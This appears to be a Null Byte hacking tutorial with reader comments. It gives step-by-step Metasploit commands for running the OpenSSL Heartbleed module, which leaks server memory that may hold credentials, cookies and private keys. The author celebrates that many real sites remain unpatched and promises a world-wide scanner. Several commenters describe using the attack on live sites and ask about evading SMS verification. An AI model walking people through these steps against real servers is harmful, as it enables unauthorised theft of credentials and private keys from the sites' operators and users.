Hack Like a Pro: Hacking the Heartbleed Vulnerability

Hacking the Heartbleed Vulnerability

Welcome back, my greenhorn hackers!

In recent weeks, the Heartbleed vulnerability of OpenSSL has been dominating the information security headlines. This vulnerability enables an attacker to extract data from the server's memory that may contain authentication credentials, cookies, the servers private key, and personally identifiable info (PII) that could be used for identity theft. As a result, websites around the world have been scrambling to close this hole. Fortunately for us, many still have not, and many may never be closed.

Basically, OpenSSL is an encryption library used in HTTPS (secure HTTP). The idea is that any data traveling over this secured version of HTTP should be secure and encrypted. During communication, OpenSSL uses a "heartbeat" that echoes back data to verify that the data was received correctly. It's kind of like one machine telling the other, "Yes, I got that data and you can send more now."

The Heartbleed vulnerability enables a hacker to trick OpenSSL by sending a single byte of data while telling the server it sent 64K bytes of data. The server will then send back 64K bytes of data to be checked and echoed back. The server will then respond with 64K of random data from its memory.

In this tutorial, I'll show you a simple exploit for getting that OpenSSL to spill the contents of its memory and possibly give us the user's credentials and other information.

Step 1: Update Metasploit

The first step is to update Metasploit to get the new auxiliary module for Heartbleed. Type:

  • kali > msfupdate

Metasploit will then go through the long and slow process of updating its modules and framework. Be patient here, it takes awhile.

When you are finally returned to the Kali prompt, the update has completed.

Step 2: Start Metasploit

Now, we need to start the Metasploit console. At any terminal prompt, type:

  • kali > msfconsole

You should be greeted with a screen like that below.

Step 3: Find Heartbleed

Now, we need to find the new Heartbleed module. We can use the built-in search feature in Metasploit. Type:

  • search heartbleed

This should bring up two auxiliary modules for Heartbleed. Select the first one as I've highlighted below.

Step 4: Use Auxiliary Module

Next, we need to load this payload. Simply type:

  • use auxiliary/scanner/ssl/openssl_heartbleed

This will load the heartbleed module.

Whenever I am using a new module, I like to look at the info page. Once we have loaded the module, type:

  • msf > info

As we can see in the screenshot below, this reveals the options that need to set in order to use this module and a description of the module.

Step 5: Set Options

Although this module has numerous options, the critical one is RHOSTS (notice the plural here). Let's set it to a target website I set up on my network that is still vulnerable to Heartbleed.

  • msf > set RHOSTS 192.168.1.169

Step 6: Run the Module

Finally, set the option 'verbose" to "true". This will provide us with verbose output.

  • msf > set verbose true

And now let's run it:

  • msf > run

As you can see in the screenshot below, the server leaked about 64K bytes of what was in its memory.

Step 7: Success

If credentials, personally identifiable information (PII), or the server's private key had been in memory, they would have leaked out as well. Of course, we could set up this Heartbleed scanner to run repeatedly to gather the info in memory at a continual basis, eventually gaining access to all the info that traversed RAM.

In my next Heartbleed post, we will start working on a scanner script to scan the world for websites and servers still vulnerable to the Heartbleed vulnerability, so make sure to come back. While you're waiting, you can use your spare time to increase your skills in Metasploit by knowing all of the commands and hacking scripts available.

Heartbleed red code and Heartbleed hearts images via Shutterstock

29 Comments

VERY NICE ARTICLE........BUT THE INFORMATION WE GET WILL BE IN PLAIN TEXT???

Secret:

The data is unencrypted.

OTW

great article master otw. i really envy the students you taught to in college or university. the way you write is like Bacon's essays, well written and easy to follow. Why don't you write a book? if you write a book that would be a best seller....

Zmaray:

Thanks for those kind words. I may write a book soon. I hope you will buy it.

OTW

Occupy The Web:

Please do and let me know when it happens.

ghost_

is it out now? or atleast are you working on it?

did you publish it? what is the title?

A great article. But I guess now there isn't anymore applications running that OpenSSL version :D (Who didn't hear talking about Heartbleed ? ^^)

There arw many, many sites that have not patched their OpenSSL.

OTW

SIR I followed the steps but this attck is not successful even on most vulernable website my terminal always displays that" Looks like there is not important information"

Thanks! Glad you posted on this because I couldn't find very much info on it other than verification tools that determine if your site is vulnerable.

OWT:

Is the script your going to be doing like an old style war dialer but for the Internet and the 21st century?

Jon:

Just a simple script to find web servers that have patched this OpenSSl vulnerability.

OTW

OTW:

We have seen in movies that a person like a hacker call through the internet to a mobile with unknown number. Is that possible? What about the new sms verification system? how to evade that?

one question.. can this be used in conjunction with sslstrip to attack both target and server?

msf auxiliary(opensslheartbleed) > run

* Scanned 1 of 1 hosts (100% complete)
* Auxiliary module execution completed

Then I get a prompt back. What happened?

hiya. how do we read the memory thats leaked as its all jumbled?

Liam:

Welcome to Null Byte!

The heartbleed hack will pull whatever info is in memory.If there are credentials in there, you will see them in ASCII.

OTW

thanks OTW. I have been using kali for a little while now and its great. ive tested the heart-bleed hack on some sites but mostly got shipping tracking numbers. where would the ASCII be?

L3G10N

it looks like i may have found something, how do i decrypt the ASCII because i can see what looks like a user name but its jumbled with @">+ ect

Take a screenshot and let's see if I can help you.

Probably the wrong IP address.

master otw please do write an article about port forwarding ..because all hacks you have demonstrated here only works within lan...but we need to hack outside the lan(computers in wan)...and please provide a way to scan the network for vulnerabilities like we scan for open ports...???

Asif:

There are numerous articles on the Web about port forwarding. I would only be duplicating what is already available.

All of these hacks WILL work outside the LAN, if you use port forwarding.

There are numerous tools for checking for vulnerabilities, Nessus, Nexpose, etc.

OTW

Exelente tutorial (Y) nunca pense que me fuera a funcionar & mucho menos para un hosting jeje estoy mas que contento con el resultado muchisimas gracias

English is the only acceptable language in null-byte

Share Your Thoughts

  • Hot
  • Latest